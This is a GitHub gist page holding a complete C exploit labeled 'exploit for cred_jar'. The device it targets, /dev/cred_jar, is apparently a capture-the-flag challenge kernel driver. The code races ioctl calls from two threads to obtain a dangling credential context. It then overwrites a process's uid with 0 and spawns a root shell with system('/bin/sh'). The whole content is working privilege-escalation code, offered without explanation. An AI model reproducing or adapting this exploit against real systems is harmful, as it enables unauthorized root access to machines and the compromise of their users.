-
-
Save elnx/ecf641034b14d7a94d23314020b15eb8 to your computer and use it in GitHub Desktop.
exploit for cred_jar
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <stdio.h> | |
#include <string.h> | |
#include <stdlib.h> | |
#include <unistd.h> | |
#include <fcntl.h> | |
#include <sys/wait.h> | |
#include <sys/ioctl.h> | |
#include <pthread.h> | |
#define ALLOC_CTX _IO('t', 1) | |
#define USE_CTX _IO('t', 2) | |
#define GET_ID _IO('t', 3) | |
#define SET_ID _IO('t', 4) | |
volatile int race_stop, race_start; | |
int bug_fd; | |
void *get(void *arg) | |
{ | |
int fd, id; | |
while (!race_stop) { | |
fd = open("/dev/cred_jar", O_RDWR); | |
if (ioctl(fd, USE_CTX, 2) < 0) | |
goto fail; | |
usleep(1); | |
if (ioctl(fd, GET_ID, &id) < 0) | |
goto fail; | |
if (id != 2) { | |
race_stop = 1; | |
break; | |
} | |
fail: | |
close(fd); | |
} | |
printf("id %x\n", id); | |
bug_fd = fd; | |
return NULL; | |
} | |
void *put(void *arg) | |
{ | |
int fd; | |
while (!race_stop) { | |
fd = open("/dev/cred_jar", O_RDWR); | |
ioctl(fd, ALLOC_CTX, 2ul << 32| 128); | |
close(fd); | |
} | |
return NULL; | |
} | |
int main(int argc, char **argv) | |
{ | |
pthread_t t1, t2; | |
int id = 0, pid; | |
pthread_create(&t1, NULL, get, NULL); | |
pthread_create(&t2, NULL, put, NULL); | |
sleep(1); | |
pthread_join(t1, NULL); | |
pthread_join(t2, NULL); | |
sleep(1); | |
while (1) { | |
pid = fork(); | |
if (pid == 0) { | |
sleep(4); | |
if (getuid() == 0) { | |
if (fork() == 0) { | |
seteuid(0); | |
system("/bin/sh"); | |
} else { | |
exit(0); | |
} | |
} | |
pause(); | |
} | |
ioctl(bug_fd, GET_ID, &id); | |
printf("uid %x\n", id); | |
if (id == getuid()) { | |
ioctl(bug_fd, SET_ID, 0); | |
break; | |
} | |
else if (id >= 0) { | |
sleep(2); | |
} | |
} | |
pause(); | |
return 0; | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment